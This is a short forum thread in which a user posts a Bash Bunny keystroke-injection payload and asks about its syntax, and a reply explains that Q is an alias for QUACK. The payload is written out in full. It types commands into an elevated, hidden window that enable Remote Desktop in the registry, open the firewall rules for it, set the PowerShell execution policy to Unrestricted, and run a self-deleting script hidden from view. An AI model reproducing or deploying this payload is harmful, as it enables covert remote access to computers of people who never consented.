Sohrce Posted March 15, 2017 Posted March 15, 2017 I downloaded the Enable RDP duckycode from the Duck Tool Kit example payloads and wanted to modify it to work on the Bash Bunny. I added a Q in front of evreything except for the strings i added Quack. Will this work and is there a difference between Quack and Q. LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 ENTER STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000 LED R B QUACK STRING C:\Windows\config-40970.ps1 Q ENTER Q DELAY 1000 Q ALT F4 Q DELAY 750 Q GUI r Q DELAY 750 QUACK STRING powershell Start-Process cmd -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 1000 QUACK STRING mode con:cols=14 lines=1 Q ENTER Q ALT SPACE Q DELAY 750 QUACK STRING m Q DELAY 750 QUACK DOWNARROW REPEAT 100 Q ENTER QUACK STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false Q ENTER Q DELAY 750 QUACK STRING powershell.exe -windowstyle hidden -File C:\Windows\config-40970.ps1 Q ENTER LED G Quote
Sohrce Posted March 15, 2017 Author Posted March 15, 2017 LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 Q ENTER Quack STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000 Quote
GermanNoob Posted March 15, 2017 Posted March 15, 2017 (edited) 18 hours ago, Sohrce said: I downloaded the Enable RDP duckycode from the Duck Tool Kit example payloads and wanted to modify it to work on the Bash Bunny. I added a Q in front of evreything except for the strings i added Quack. Will this work and is there a difference between Quack and Q. You have to install the dependencies by using the DuckyInstall payload in advance. There is no difference between QUACK or Q instead of the length... AS it is written in wiki: QUACK Injects keystrokes (ducky script) or specified ducky script file. Q Alias for QUACK Edited March 15, 2017 by GermanNoob Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.